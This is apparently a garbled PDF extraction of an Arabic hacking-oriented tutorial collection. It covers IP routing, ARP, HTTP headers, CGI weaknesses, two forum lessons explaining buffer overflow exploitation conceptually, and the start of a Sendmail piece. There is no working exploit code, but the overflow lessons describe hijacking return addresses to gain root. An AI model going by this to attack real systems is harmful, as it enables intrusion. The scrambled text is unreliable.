:: . الذي یسلم لك الخطابات هو نفسهیوضع عنوان الجهة المرسلة P I/ TCPالي كتلة ال او حزمة البیانات Packet عندما تمرر ال

IP .او معلومات ال header IP والجهة الهدف او المرسل الیها في ال Remote .ام بعید Local یحدد هل الجهاز الهدف محلي IP ال

. ذكر ان الجهاز الهدف علي نفس الشبكة IP اذا ال local الهدف یكون . بكة اخريذكر ان الهدف في ش IP اذا ال remote الهدف یكون

الموجود فیه IP address بتحدید نوع الجهاز الهدف او المستقبل باالعتماد علي ال یقوم IP ال . في الجهاز المرسل Subnet Mask وال

هویة الشبكة ، ویستخدم في هو هذا الجزء مهم جدا ألنه یحدد Subnet Mask ::تعریف الویصبح كل رقم یمثل شبكة مستقلة ولكن ى عدة أقسامواحد إل IP الشبكات الكبیرة عندما یقسم رقم

تعني التقسیم Subnet و الـ Subnet Mask تشترك كل هذه الشبكات بهویة واحدة یمثلها الـ . سنتعرف علیه بالتفصیل في الدروس القادمة .:: وهو الذي یحدد رقم الشبكة ورقم الجهاز

110

mote re :ام بعیدة : localوجهة البیانات محلیة تحدید . كیف یوصل البیانات الي وجهتها یحتاج الي تحدید IP ال

. یمكن ان یتصل مباشرة مع الجهاز المقصودIP / TCPعنوانها في شبكة محلیة) الجهاز(اذا الجهة یحتاج الي ارسال الحزمة من خالل الIP / TCPفان ال اذا كان الجهاز في شبكة اخري او بعیدة

.Default Gateway host هو عنوان في الجهاز Router ,یسمي ایضا Default Gateway :: التعریف

default gateway ال, بمعني اخر . علي الشبكة یقوم بتوفیر طریق خارج الشبكة المحلیة .:: . عبارة عن باب یساعد علي الدخول من خارج الشبكة

الطرد لشخص یسكن في سالاذا اردت ار. مشابهة الرسال الطرد s 'IP/ TCPعملیة اتصاالت الاذا ارسلت الطرد الي شخص یسكن . یمكنك ان تسلم الطرد بنفسك, نفس الشارع الذي تسكن انت فیه

بعد ذلك مكتب البرید سیقرر كیف یسلم , یجب ان یذهب الطرد الي مكتب البرید, في أي شارع اخر Default Gateway .راضیةالبوابة االفت مكتب البرید یشبه. الطرد الي الجهة المطلوبة

صندوق البرید الذي یوزع الطرود الي الشبكة یشبه ROUTER الشكل التالي یوضح ان ال

: الصحیحة . یرسل حزمة بیانات الي جهاز شكوالته RAAD الشكل التالي یصور كمبیوتر

عنوان الجهة المرسلة شكالته ویحدد ان شكالته سیحلل RAAD في حزمة IP بروتوكول ال RAAD .المرسل او محلي بالنسبة للجهاز Local جهازها

شكل یوضح عمل الراوتر

111

ان االثنین الراسل IP یحدد ال عندما localالجهاز الهدف او المرسل الیه الحزمة یكون :: . التي خصصت لها IP ال واالجهزة المرسل الیها لها نفس قسم الشبكة في عناوین

یاخذ عنوان كارت الشبكة من الهدف یحتاج الي ان IP فان ال Local اذا كان الجهاز الهدف محلي.

یبحث في جدول المسارات IPفان ال ( أي في شبكة اخري( اذا كان الجهاز الهدف بعید routing table عن اوضح طریق الي تلك الشبكة .

gateway ال یاخذ IP اذا و جد في جدول المسارات العنوان او الطریق الذي یریده فان عنوان ال . او العنوان الذي یرید من جدول المسارات

ان یاخذ عنوان الكارت للبوابة یحتاج الي , IPطریق في الجدول طبعا اذا لم یكن هناك عنوان او default gateway .االفتراضیة

. طبعا ده كله سیتم تشریحه في الدروس القادمة

:: او الكارت hardware تحدید عنوان ال لیحدد أي من عناوین الIP / TCPلعملیة القرار التي یستخدمها ال المخطط ادناه تمثیل

hardware الشبكة او ال او كارتress Mac addهي المطلوبة الرسال الحزمة :

112

بكتابة عنوان Administrator یقوم مدیر الشبكة host ,ل IP address عندما یخصصسترسل الي البوابة الحزمةIP / TCP .كجزء من متغیراتfault gateway Deال

. یفترض ان تتجه الي شبكة اخري mac address االفتراضیة للDefault gateway بعد ذلك یحدد ما اذا كان ال IP الواجهات او المستهدف موجود علي احد

. اخر Routerالكروت المدرجة عنده او هو یحتاج الي ان یمرر الحزمة الي

اذا كان هناك طریق مباشر من . المطار والسفر الي جهة هذا یشبه الذهاب الي , باستخدام قیاس اخر . اذا لم یتواجد طریق مباشر سترسل عبر اقرب طریق الي جهتك . ستستخدمه, المطار الي جهتك

للجهاز Hardware address للحصول علي ال ARP یستخدم IP في الخطوة القادمة الللجهاز المستهدف بناء hardware المحقق الذي سیجد عنوان ال هنا یشبه ARP ال. المستهدف

Internet Protocol .یسال عنه ال الذي IP علي عنوان ال ARP:: Address Resolution Protocol::بروتوكول اقرار العنوان -2

. العتاد الي عنوان IP یقوم هذا البروتوكول بترجمة عنوان ال

الذاكرة وهي مكان في ARP cache ,اول مكان ینظر فیه هو IP عنوان ARP لیترجم IP عناوین ال ARP یحفظ فیهRAM:: random access memory :: ,العشوائیة

. وعناوین العتاد التي تمت ترجمتهانون فان الحزمة تع ARP cache ,في ال و العتاد IP وجد عناوین ال ARP طیب اذا ال

. بعنوان العتاد من غیر بحث زائدبطلب نشر لكل ARP یقوم ARP cache غیر موجود في IP address الثانیة اذا ال الحالة . االجهزة

لمدة ARP cache یخزن في, لعنوان العتاد address IP بعد ان یتم تخصیص ال ::

. دقیقتینفان المدخل یبقي مرة , خالل هذه الدقیقتینفي IP طلب البحث مجددا لنفس عنوان ال IP اذا ال

المدخل یبقي في ذاكرة ال . لدقیقتین اخریین ARP او ذاكرة ال ARP cache اخري في الARP بعد ذلك یتم اخراجها من ذاكرتها, دقائق 10كحد اقصي .

113

ARP cache الصورة ادناه توضح ال

: انواع من البیانات3الذاكرة تحتوي علي او ال Hardware address العمود الثاني ال IP address ,العمود االول یوجد فیه ال

, MAC الالعمود الثالث نجد فیه الوصف لحالة المدخل في . ARP cache العنوان أي متغیر ذلك في حالة ان dynamic حالته ARP cache اذا كان المدخل في ال العنوان او ثابت اذا تم اضافة static واذا كان broadcast ,اكتشف خالل عملیة ال

manually او یدویا .

: او عنوان العتاد hardware address ال ااستخدام النشر للبحث عنیبدا بما ARP فان بروتوكول ARP ,في ذاكرة ال IP address ال ARP ا لم یجد الاذ

. الطلب ینشر في الشبكة المحلیة هذا ARP .او طلب ARP request .یسميالمستهدف علي hardware عنوان ال یعنون الي أي جهاز في الشبكة بوضع ARP نشر الالجهة المطلوبة حتي IP عنوان وي عليیحت ARPنشر الFF :FF:FF:FF:FF: FF .القیمة

. المصدر hardware ایضا یحتوي علي عنوان. یستطیع المستقبل التعرف علیها وعنوان ال IP تقوم بوضع, به بعد ان یصل الي الجهة او الجهاز وتعرف ان النشر هي المقصودة

hardware المصدر او المرسل في ذاكرة ال ARP الخاصة بها . الحزمة فان كارت الشبكة یقوم باخراج, وصلت الي أي جهاز ARP packet ن الفي حال ا

packet من خط الشبكة ویمررها خالل طبقة واجهة الشبكة الي طبقة االنترنت وال. ARP ال ARP في الوجهة المستقبلة یعمل اختبار للحزم لیري هل الحزمة لعنوان hardware الجهاز . المرسل

اذا وجد فیها عنوان ال . لیس لذلك الجهاز فان الحزمة ترفض ARP اذا كان طلب ال

114

hardware ال, تبع الجهاز المرسل IP وعنوان ال hardware لمصدر الحزمة توضع في , ARP cache ویتم عمل ARP reply لمصدر الحزمة .

ARP reply .الهدف سیكون موجودا االن في hardware عنوان Hardware وال IP address ال ARP reply ,اوP ARعندما تصل اجابة

address یبقوا في ARP cache لدقیقتین .

:: هـامــــــــــــــــــــــة مصطلحــــــــــــــــــات::

IP Address . لتعریف شبكة او جهاز IP :: Internet Protocol ::عنوان یستخدمه

Logical Address

. ویسمي به الجهاز , یعدلهذا العنوان یمكن ان

Subnet mask . موجود في الشبكة IP أي عنوان متغیر یتضمن

Router

. یربط ببن الشبكات ویقوم بتحریك حزم البیانات من شبكة الي اخري جهاز

Remote Network Router .الجانب االخر من ال وهي تقع في, شبكة غیر الموجود فیها الجهاز

ay Default Gatew

. اخري الي شبكة packet ویستخدم لتمریر ال, الراوتر IP متغیر یكون في عنوان

Routing Table . العناوین التي تشیر الي افضل طریق الي الشبكات االخري الجدول الذي یحتوي علي

::ARP::Address Resolution Protocol

hardware address العتادالي عنوان IP address لترجمة عنوان بروتوكول یستخدم.

115

ARP cache hardware .ترجمت حدیثا لعناوین ال التي IPمنطقة في الذاكرة تحتوي علي عناوین ال

ARP request

hardware .ال لعنوان IP الحزم المنتشرة التي تقوم بالبحث عن ترجمة ل عنوان ال

ARP reply و IP address وتكون محتویة علي الest ARP requالي الي راسل ال الحزم التي ترجع

ARP .اللي طلبهم ال hardware address ال

116

تحت المجھرHTTPبروتوكول ال .01/html HTTP.index/com.arabicteam.www://GET http

Accept*/* : sa-ar: Language-Accept

deflate, gzip: Encoding-Accept DigExt; 98Windows ; .05MSIE ; tiblecompa(.0 4/Mozilla: Agent-User(

com.arabicteam.www: Host Alive-Keep: Connection-Proxy

; =*************Password; Kondor=Username: Cookie; 985145236=bblastvisit; theblues=Stylesheet; arabic=language

985145966=bblastactivity _________________________________________________________

:و في ھذه الحالة علینا التفريق بین حالتین كما في المثال السابق حیث يتم األتصال مع (استخدام بروكسي -أوال

)arabicteamالبروكسي و يتم أرسال البیانات السابقة له لجلب صفحة ال

األتصال مباشر دون بروكسي عندھا يتم األتصال مع السیرفر المستضیف -ثانیا :html.indexسال البیانات التالیة له لجلب صفحة ال للموقع و إر

.01/html HTTP.index/GET

Accept*/* : sa-ar: Language-Accept

deflate, gzip: Encoding-Accept DigExt; 98Windows ; .05MSIE ; compatible(.0 4/Mozilla: Agent-User(

com.arabicteam.www: Host ; =*************Password; orKond=Username: Cookie; 985145236=bblastvisit; theblues=Stylesheet; arabic=language

985145966=bblastactivity close: Connection

وھي عادة تستخدم لجلب معلومات من الصفحة أي ترويسة GETأوال ال

ة ھامة و ھذه الترويسPOSTالتصفح العادي لكن ھناك ترويسات أخرى مثل ال

117

getألن ال ) البیانات الطويلة(جدا و ھي تستخدم ألرسال بیانات إلى السیرفر post بايت على ما أعتقد و ال 65000عاجز عن أرسال بیانات ضخمة تزيد عن

. و غیرھاphp و ال cgiتستخدم بكثرة بال و ھي غیر مشھورة و نادرة األستخدام ألنھا تستخدم HEADو يوجد ترويسة ال

.عادة لجلب معلومات عن ملف دون تحمیله

عنوان الصفحة المطلوبة و ھنا نفرق بین حالتین -ثانیا :األولى األتصال مع البروكسي عندھا نعطیه العنوان كامل أي مثل

html.index/com.arabicteam.www://http ي مثل و األخرى األتصال بالموقع مباشرة عندھا نطلب منه عنوان الملف فقط أ

: /html.index

مثالhtml.index/2dir/1dir/أو

و ھي دتل على HTTP/11. أو HTTP/01. يجب أن يتبع العنوان بالترويسة - ثالثا و ھناك فرق بین األصدارين مثل أقفال األتصال بعد انتھاء httpاألصدار لل

.األرسال

و نظام mimeد نوع ال وھي تحد: host الترويسات األختیارية عدى ال - رابعا التشغیل و اللغة و ما إلى ذلك من معلومات إضافیة و لرؤية معلومات إضافیة

.MIMEعن أنواع ال -media/types-media/assignments/iana/notes-in/edu.isi.www://http

types.

و يأتي بعدھا : HOST: لكن ما يھمنا ھنا ھو الترويسة الضرورية و ھي ال :لسیرفر أي مثل عنوان ا

com.arabicteam.www: HOST

األمر الذي استفدنا منه ھو كیف نتصفح األنترنت عبر التلنت أو أي برنامج اتصال ...عادي و أصبح لدينا المعلومات الكافیة لصنع برنامج يستخدم ھذا البروتوكول

118

رجة و لتحلیل البیانات الخاSniffersيمكن األستفادة من برامج ال : مالحظةالداخلة للجھاز و تحلیل كل الباكیتس و التعلم منھا و أيضا للتعلم أكثر عن

.البروتوكوالت

و عند أرسالك لھذه المعلومات للسیرفر فسیرسل لك السیرفر الملف المطلوب .أيضا ضمن ترويسات و ضمن نظام محدد سنشرحھا فیما بعد

.Traceroute و كیف يتم يتم ال و الدرس الذي يلیه سنتكلم بأعماق األتصاالتانتھى (httpالذي ھو تروجان يستخدم البروتوكول ال ( تروجان httpبرنامج ال منه لكني في النھاية توقفت عن العمل به ألني وجدته دون % 99العمل من

.جدوى

119

CGIماھو


CGIمقدمة للـ )1(

CECOMMON GATEWAY INTERFA=CGI ھي الواجھة التي تسمح باالتصال بین جانب المستخدم عن طريق المتصفح أو البرامج )HTTP(و خالفه و جانب الويب سیرفر الذي يفھم بروتوكول

ھو البروتوكول الذي يستخدمه سكريبت السي جي أي و السیرفر IP/TCPالـ

البورت المحددة. أثناء االتصال )الممكن أن تتغیر ھذه البورتمن ( 80لھذا البروتوكول ھي

تستطیع سكريبتات السي جي أي أن تقوم بتولید صفحات الويب و الصور و أيضا

نتائج محددة طبقا لمدخالت معینه يقوم مبرمج السي جي أي بتحديدھا

:يقوم عمل سكريبتات السي جي أي علي خطوتین أساسیتین

جة أولیه للبیانات التي أدخلت في الخطوة األولى يقوم السكريبت بعمل معال-1 له في الخطوة الثانیة يعمل السكريبت كقناه للبیانات التي يقوم المتصفح -2

بارسالھا الي السیرفر أو العكس

يقوم سكريبت السي جي أي بتشفیر البیانات حتي تتمكن من العمل في أي مناخ للعمل

انت لغة مجمعة يمكن كتابة سكريبت السي جي أي بأي لغة برمجة سواء ك

مثل الفیجوال بیسك أو لغة مترجمة مثل البیرل و الفرق الوحید بین نوعین اللغات أن البرنامج

المبرمج باللغة المجمعة سوف يكون أسرع في التنفیذ و لكن اللغات المترجمة

120

أسرع في عملیة التطوير للسكريبت اذا أردت أن تعمل علي تعديل السكريبت أو تطويره

:وامر التي تعتبر وثیقة الصله لموضوعنا ھي كالتالي أھم األ

1- GET ھذا األمر يقوم بطلب بیانات من السیرفر للمتصفح 2- POST ھذا األمر يطلب من السیرفر قبول المعلومات المدخلة الیه من

المتصفح3- PUT ھذا األمر يطلب من السیرفر قبول المعلومات المرسله الیه كبديل عن

الموجودة حالیاالمدخالت نقاط الضعف) 2(

نقاط الضعف التي يسببھا سكريبت السي جي أي لیس ضعفا في السي جي أي نفسه و لكنه

أو في أنظمة التشغیل المختلفةHTTPضعف في بروتوكول الـالسي جي أي يسمح باستغالل نقاط الضعف الموجودة و لكن ھناك طرق

أخري للوصول الي تحطیم النظام أو FTPكمثال يمكن الوصول الي الملفات الغیر محمیة باستخدام الـ . األمني

TELNET

121

Buffer Overflowsماھو

LAMeR :للكاتب

وانشاهللا تستفیدون .. Buffer Overflowsاقدم لكم درس يشرح ما معنى الـ منه

يله نبدأ

:محتويات الدرس

؟Buffer Overflow ما ھو الـ - 1<-- -- --- --- -- -- -- --- -- -- --- )Proccess( المعالجه- 2<- -- -- -- --- -- -- --- )Memory management( إدارة الذاكره - 3<- -- --- -- -- --- --- -- -- -- --- -- -- --- Buffer Overflow استغالل ماذكر في الـ - 4<- -- -- --- -- -- --- --- -- -- -- --- -- -- --- ه المقالة؟ماذا يجب أن أعرف قبل أن أقرأ ھذ*

لیس الكثیر،،، فھذا دلیل اساسي لك اذن فقط تحتاج ان تكون لديك معرفة أساسیة بمفھوم برامج الحاسوب وإدارة الذاكرة

؟Buffer Overflowما ھو الـ - 1< - --- --- -- -- -- --- -- -- --->

Buffer Overflow حالة تحدث لبرنامج بسبب برمجة سیئة أو بمعنى اخر برمجة .ءتحمل أخطا

code' تسمى فايروس Buffer Overflowاحدث ثغرة يمكنك أستغاللھا من نوع

122

red ' التي أستغلت في خادم ،IIS لمايكروسوفت -MS web server - على ( عندما يظھر برنامج ما متغیر بحجم ثابت Buffer Overflowعموما، يحدث

متغیر أكبر من و القیمة التي خصصت إلى ھذه ال) بايت20سبیل المثال،حجم .حجم المتغیر

:خذ ھذا المثال

ثم : "رجاء إطبع اسمك األول: "يظھر برنامجي على الشاشة ھذه الجملة) اسمه األول(سیأخذ برنامجي من المستخدم البیانات التي سیدخلھا وھي

.ثم توضع في متغیر فتظھر في برنامجي او تخزن مخصص لتخزين بیانات حجمھا المشكلة ھنا تكمن في انه إذا كان المتغیر

بايت 25حجمھا )وھي اسم المستخدم( بايت والبیانات ھنا15األقصى يساوي يتضح لنا ان اسم المستخدم وضع في مكان اقل (التي ستخزن في المتغیر

).من حجمه تطفح " بايت من المؤكد انھا سـ15اذن ماذا سیحدث للبیانات الزائدة عن

Overflow "لتي خصصت لمتغیر االسمعلى الذاكرة ا.

:عندما يبدأ البرنامج، تخصص الذاكرة >1var><2var><vname><Other things in memory<

10b15b 6b )1var 2 وvar متغیرات لیست لھا عالقة باألسم المدخل ,vname المتغیر الذي

بايت15حجمه )وھو الذي سیحتوي االسم الذي سیدخله المستخدم

abcabcabcabcabcabcabcabca" ن المستخدم سیدخل االسم نفترض ا

bc "حینھا ستبدو الذاكره ھكذا:

avalusabcabcabc2somevalue abcabcabcabcabcabc

>1var>< 2var><vname>< other things go here<

بسبب البیانات المدخلة " overflowedطفح "vnameاذا ماذا حدث ؟؟ المتغیر أشیاء اخرى في other things in memory"مستخدم و قیمة علیه من قبل ال

.الحروف من ادخال المستخدم) overflow(تغیرت بسبب فیض" الذاكره

123

اذن كیف أستغل ھذا الخطأ؟؟؟قبل أن نصل إلى الجواب، ھناك بعض األشیاء األساسیة المھمة التي يجب

.علینا أن نعرفھا حول تركیب وبنیة الحاسوب ، لكن المفھوم مماثل لباقي linuxالمقالة سنناقش نظام لینكس في ھذه .األنظمة

):Proccess(المعالجه-2< -- -- -- --- -- -- --->

إن الوحدة الوظیفیة األساسیة في حاسوب يعمل ھي عملیة المعالجه )Proccess.( في الحاسوب ھنالك العديد من العملیات ونظام التشغیل مسؤول

تي تجعل العديد من العملیات تعمل في نفس الوقت في عن تقسیم القوة ال .الحاسوب

كیف ... صحیح" proccesses-Multi متعددالعملیات "لیس ھناك شيء إسمه تنتقل بین العملیات كل على حده ) CPU(اذن؟؛ ان وحدة المعالجة المركزية

،بسرعة كبیره بحیث تبدو مثل العديد من المھام التي تعمل في وقت واحداذا تبدو لنا كأن العملیات تعمل في وقت واحد وھذه من خدع الحاسوب التي

:) ..يؤديھا علینا كل عملیة لھا عنوان فاضي من الذاكره ، واليمكن ألي عملیةآخرى تدخل في

وھذا يرشدنا الى شي اخر يجب ان تفھمه . ھذا المكان الفاضي من الذاكرة :وھو

):Memory management( إدارة الذاكره -3< - --- -- -- --- --- -- -- -- --- -- -- --->

virtualالحديثة ذاكرة افتراضیة - operating systems-تدير أنظمة التشغیلmemory)تخیلیة.(

الوصول مباشرة إلى الذاكرة ) برنامج مثال(ذلك يعني بأنه اليمكن ألي تطبیق لماذا؟؟.الحقیقیة

تحويل العناوين " جدول تخطیط تمتلكOperating Systemانظمة التشغیل )" .تخیلیة(الحقیقیة من الذاكرة الى عناوين افتراضیة

124

بتحديد مكان في الذاكرة لبرنامج )نظام التشغیل (OSوعندما تقوم ذاكرة الـ .معین لتشغیله ،يأخذ البرنامج العنوان التخیلي فقط ، ولیس العنوان الطبیعي

وھي انه من المعلوم أن ) التخیلیة(اضیةو ھنالك استخدام اخر للذاكرة اإلفتر، فنظام التشغیل )أو برنامج(الذاكرة الحقیقیة ال ترتبط مباشرة بكل عملیة يستخدم مساحة على القرص الصلب كذاكرة،

،ذلك ألن )مكان الذاكرة الحقیقة ( والتطبیق ال يمكنه أبدا معرفة مكان الذاكرة .لب تتبدل وتتغیرالمساحة المخصصة للذاكرة في القرص الص

ان الذاكرة ال تنقسم الى ذاكرة حقیقة وذاكرة افتراضیة بل أنھما :. توضیح

ينتمیان لذاكرة واحداذن ما فائدة التسمیة الى حقیقیة وافتراضیة ؟؟ الجواب ھو للمتییز فقط ، حیث

ومكان ھذه (ان الذاكرة الحقیقة تمثل مساحة معینة من القرص الصلب اي (لذلك سمیت حقیقیة او بمعنى اخر طبیعیة ) یر مستمرالمساحة في تغ

)بأستطاعتك لمس مكان الذاكرة الطبیعیة بیدك على القرص الصلبللذاكرة ) غیر حقیقي (وفائدة الذاكرة اإلفتراضیة ھي إعطاء عنوان افتراضي

الحقیقیة اي يعطي عنوان كأسم فقط لمكان مساحة الذاكرة الطبیعیة في وإن تغیر مكان المساحة المخصصة للذاكرة يظل العنوان القرص الصلب ،

.ثابت) التخیلي(اإلفتراضي Buffer Overflow استغالل ماذكر في الـ - 4< -- -- --- -- -- --- --- -- -- -- --- -- -- --->

اآلن نصل إلى الجزء األھم والمرح كیف نستفید من الذي قلنا عن المعالجة وإدارة الذاكرة للوصول والدخول الى

وأختراق النظام؟ تذكر نحن قلنا في وقت سابق بأنه عندما يكون ) Root(الجذر من المستخدم أكبر حجما من الذاكرة التي خصصت لھذه ) البیانات(اإلدخال

في الذاكرة التي بعد االسم ) overflow(البیانات، البیانات الزائدة ستفیض .ي نستفید منه في األختراقالمتغیر؟ ھذا المكان من الذاكرة ھو المكان الذ

البیانات التي يدخلھا المستخدم ) مكان(داخل خط : ماذا نعمل في ذلك المكانفي المثال السابق وھو االسم األول الذي يطلب من قبل البرنامج ثم أدخلناه (

نضع األوامر األكثر شعبیة للحاسوب، حیث ھذه األوامر تجعل الحاسوب ) ستخدامه فیما بعد للقیام بالسیطرة الكاملة ھیكل نستطیع ا) ينتج(يحدث

القیام بھذا العمل لیس بیسطا كما يبدو لك، إذن لو أردت . للنظام المستغل، Buffer Overflowsمعرفة كیف يعمل ، أنت يجب أن تقرأ المقالة القادمة حول

125

في Buffer Overflowsالذي سیصف بالضبط كیف إلستغالل واحده من الـ .اإلختراق

Buffer Overflowخیرا اتمنى انكم فھمتوا الدرس زين وعرفتوا ايش معنى ا

واللي فھم الدرس نص نص يعید قرائته اكثر من مرة مع التدقیق وانشاهللا يفھمواذا فیه سؤال يتعلق بالدرس انا حاظر ويالیت ما تستبقون األمور وتسألون

لكم يشرح التفاصیل أسأله عن طريقة األستغالل ألني بأحط درس مثل ما قلت قريبا انشاهللا

126

BOFدراسة Red Code: للكاتب

كتبت ھذا الموضوع قبل عده ايام في منتديات المدمر واالن انقله ھنا بعد ان تم

) حمد هللا علي السالمه( افتتاح المنتدي مجددا قاري اي فھم عمیق النه ال يتطلب من ال طبعا انا اعتبر ھذا الموضوع ممیز

للمعالجات او للغه االسمبلي او لغه السياتمني للجمیع الفائده واالستمتاع وانتظروا قريبا مفاجاه من العیار الثقیل

كتابه االستثمارات لمن اليملك اي خبره برمجه او خلفیه عن طبیعه بخصوص الوقت اخلیكم تمخمخون مع درسنا الیوم الثغرات حتي ذلك

نبدابسم اهللا

buffer over flow exploit قوي وسھل االستخدام.... ھو االداه رقم واحد في ايدي ھاكرز ھذه االيام

ومنتشر ويشكل الخطر االكبر والوحید . علي مشاريع ھذه االيام

overflow اللي تمكن الھكر من عمل unchecked buffersالــ ھناك االالف من . لھا

صدرت للتعامل مع CERT من نصائح% 70معرفه ان ذلك ب ويمكنك التاكد من والمشكله. ھذه المشكله

االكبر ان االستثمارات لھذا النوع من الثغرات سھله االستخدام لدرجه ان ممكن ينفذونھا بدون اي مشاكل النه االطفال

وقوي جدا النه في كثیر من . االكواد اليحتاج الي اي خبره تقنیه لتنفیذ ھذه ومن ثم امكانیه ROOT ينفذ الكود كــالحاالت

. تنفیذ اي شي يخطر علي بالك كیف ؟ buffer overflows يسمح بعمل unchecked bufferالــ

البیانات عندما يقوم مبرمج التطبیق باھمال حجم unchecked bufferيحدث الــ في معظم لغات البرمجه.

نظريا المبرمج يعین حجم مناسب . لیخزن البیانات bufferيعین حجم ثابت للــ لتخزين البايانات buffer وكافي كا

. مثاال يوضح الفكره اكثر دعونا نعطيلدخول routine لنفرض انك يامن تقرا ھذه الكلمات مبرمج وتريد كتابه

طبعا, المستخدمین في تطبیق تعمل علیه م يحدد وكلمه المرور من المستخدمین ومن ث سوف يستقبل اسم المستخدم

127

التي يجب من اول االشیاء. ھل يسمح له بالدخول ام ال المستخدم السم bufferعلیك تعیینھا كم المساحه التي سوف تخصصھا للــ

وفي النظام الذي تعمل علیه. الیوزر والباسورد خانه لذاكره 100قررت تحديد . خانه 32الطول االقصي السم المستخدم

اكثر من كافیهوالتي تعتبر buhfferالـآمن الن routineاطول اسم مستخدم واعتقدت بشكل خاطي ان الــ لحفظ

بكثیر من اكبر bufferحجم الــ خانه التي يدخلھا المستخدمین افتراضیا لكن بما انك اھملت التدقیق 32

bufferالمتعلق بفحص المدخالت قبل نسخھا الي الـطبیق اللي تبرمجه يمكن استثماره فكل في الت ھذا routineفھذا يعني ان الــ

خانه 100مايلزم المھاجم ھو ارسال اكثر من buffer over flow .وتمكن من عمل

buffer over flow الحاالت عند عمل االن دعنا نتكلم عن االستثمار ففي ابسط crash للتطبیق يحطمه

DOS بیقكيكون قد نجح ھجوم حجب الخدمه علي تط ويوقفه عن العمل وبذلك وفي معظم الحاالت يقوم المھاجم ببناء .

المدخالت التي سوف يرسلھا للتطبیق بحیث يتمكن من تطبیق اوامر محدده ھذه االوامر ممكن ان تكون اي شي علي نظامك

تركیب باب خلفي او اي شي مثال عمل فورمات للھارد دسك او سرقه بیانات او . اخر

: دعونا نوضح اكثر رئیسي routine للبرنامج subroutines .شكل لكمبیوتر تنظم عليبرامج ا

) main(يقوم ومن ثم تعید function والتي تنفذ تعلیمات محدده subroutinesالــ باستدعاء

main الي التحكم مره اخره لتقوم بعملھا علیھا تخزن بیانات مختلفه وتستخدم لذلك subroutinesالــ

stack ره تسميمنطقه معینه من الذاك memory ضمنھا عنوان في الذاكره ھذه البیانات من. لتخزين ھذه البیانات

address الذي يقوم الــsubroutines كذلك . الیه بعد ان ينجز المھمه التي برمج من اجلھا باعاده التحكم

موقته التي نسمیھا يخزن بیانات Subroutinesالــbuffer في الــstack يتم تحديدھا في ه ينفذ فیھا والذاكره المطلوبهفي كل مر

في وحده قیاس تسمي stackالــ. stack frame الــstack frame يحتوي علي مساحه الي buffer ممكن يحتاجه

128

routineالي الــ return address التحكم كذلك عنوان اعاده subroutine الــ

االساسي والذي قام اساسا باستدعاء ھذا بانھاء عمله يعید التحكم الي subroutineبعد ان يقوم الــ subroutine .ــالـ routineالــ

stack frameالذي قام باستدعائه بالقفز مباشره الي عنوانه الموجود في الــ stack frameومن ثم يتم حذف الــ

ا اذ buffer overflows .يحدث الــ میكانیكیه االداء ھذه تعمل بشكل رائع حتي stack buffer خانه الي500ارسلنا

خانه علي الذاكره 400خانه نكون بذلك قد قمنا بالكتابه فوق 100مخصص لـ مما يعني اننا كتبنا فوق عنوان stack frameالمجاوره للـ

اخري buffers االعاده وكذلك main اعاده التحكم الي subroutineالحاله عندما يحاول الــ االن في ھذه

stack frameالمحدد في الـ سوف يقفز الي العنوانمالذي overflowed buffer والذي قمنا قبل قلیل بالكتابه علیه عن طريق

يحدث االن ؟ crash .موجود ببساطه يتحطم عندما يحاول البرنامج ان يقفز الي عنوان غیر

االن لنري كیف تكون الحلول الذكیه خانه مختاره بعنايه يستطیع المھاجم التحكم 500 عند ارسال . واالكثر مھاره

return addressبالــ بدل الذھاب الي عنوان غیر موجود وتحطیم البرنامج يقوم بتوجیه البرنامج للقفز

وتنفیذه exploit الي عنوان كود االستثمار وقبل ھذا يجب علي المھاجم تنفیذ مھمتین

تخدامهللكود الذي ينوي اس load عمل: االولي تشغیله تنفیذ ھذا الكود اي: الثانیه

سلسه يقوم المھاجم بارسال. يقوم بانجاز كل المھمتین stack bufferطبعا الــ حرفیه طويله كمدخالت للبرنامج

عندما . وكذلك عنوانه بالذاكره وتحتوي ھذه السلسه علي الكود المراد تنفیذه load يتم عمل overflowsيحدث الــ

subroutineللــ return addressوكذلك الـ stack memoryفي الــ ود المرسلللك يتم

ھكذا عندما ينھي . وتغییره لیصبح عنوان الكود المراد تنفیذه الكتابه علیه يقفز الي عنوان عمله subroutineالــ

وممكن يركب االن الكود كما قلنا قد يفرمت الھارد. كود المھاجم فینفذ الكود

129

ك دور وممكن يھاجم بقیه الشبكه ببساطه يمكنبالكن سماحیات . يمكن ان ينفذه الشخص علي نظامه ان يكون الكود اي شي

نوع من الھجمات البرنامج المخترق تحدد بشكل كبیر ايتنفیذ اي امر فیمكن root فمثال اذا كان البرنامج يعمل. يمكن ان تطبق علیه

حیات قلت اخطار الھجوموكلما قلت الصال, مھما كان يحتوي علي تكنولوجیا محمیه تمكنه من منع Enterceptبالــ ھناك مايسمي

overflowsحاله تنفیذ البرامج فياالنتاج و يعتبر حل امني قوي وموثوق ولكن لالسف لیس خیرا جیدا النظمة

ويسبب اشكالیه عند محاوله تركیب باتشات الرقع االمنیه-------------

: صه الموضوعخالاليطبق اال علي البرمجیات الضعیفه يعتقد الكثیرون ان ھذا الھجوم حالیا1-

يرتكبه والغیر مھمه وھذا اكبر خطا ممكن ان الشخص ممكن Buffer overflow exploits are قال لي يومااا احد محترفي امن المعلومات

here to stay هللا والن الن الكمال:ااااا لسببین ويقصد ان الھجوم ھنااااا لیبقي طويالاا

المبرمجین لن يعملوا مجددا اذا كتبوا برنامجا ال يعید الزبون الیھم checked buffers ومن وجه نظري انه اليوجد برنامج واحد كبیر وال صغیر يعمل

. كاملاضافه ان ھناك عامل نفسي عند المبرمجین يدفعھم لالخطاء سواء بوعي او

احترازي اذا تمكن االشخاص من استخدام مافعلوهكسلوك بغیرهعندھم عباره عندما استطیع بناء قصر وال يمكنني ونسوھم فتجد في اال وعي

امزح باالخیره ان اسكنة فانا اعرف كیف ادمره : واخیرا

تحیاتي مع........ الھجوم منتشر سھل وقوي

130

Send Mailماھو

IcEr:للكاتب

:)السالم علیكم و رحمة اهللا و بركاته و ھو مترجم من احد المواضیع االجنبیه send mailموضوع الیوم ھو شرح ل

:) تھا و حبیت اترجمھا لكم قرا ھذا sendmailالمھم خلینا نشوف ايش ال

sendmail و يعمل على ارسال 25 عباره عن ديمون و ھو يعمل على البورت االيمیالت

)رسائل صادره( sendmailمقدم الخدمه لديك قد يستعمل ملقمین لل ...مثال

25ت و ھو على البورcom.xxxxx.mailgwاالول الصادر مثل 110 و ممكن يعمل على البورت com.xxxxx.mailو الثاني الوارد مثل

لذلك اليمكنك ان ترى ....بالنسبه للوارد فھو قد يحتاج الى كلمه سر و يوزرنیم :)الرسائل الوارده

